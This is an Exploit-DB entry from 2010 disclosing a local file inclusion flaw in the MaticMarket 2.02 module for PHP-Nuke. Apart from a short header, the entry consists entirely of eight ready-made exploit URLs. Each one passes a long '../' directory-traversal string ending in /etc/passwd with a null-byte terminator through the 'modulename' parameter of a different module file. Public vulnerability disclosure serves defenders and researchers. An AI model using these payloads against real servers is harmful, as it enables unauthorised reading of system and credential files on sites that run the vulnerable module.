MaticMarket 2.02 for PHP Nuke LFI Vulnerability

2010-12-20T00:00:00
ID EDB-ID:15783
Type exploitdb
Reporter xer0x
Modified 2010-12-20T00:00:00

Description

MaticMarket 2.02 for PHP Nuke LFI Vulnerability. Webapps exploit for php platform

                                        
                                            #MaticMarket 2.02 for PHP Nuke LFI Vulnerability
#Url: http://sourceforge.net/projects/maticmarket
#Author: xer0x
#Expl:
http://localhost/modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/deco/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/blanc/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/default/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00
http://localhost/modules/maticmarket/bleu/gold/bas.php?modulename=../../../../../../../../../../../../../../etc/passwd%00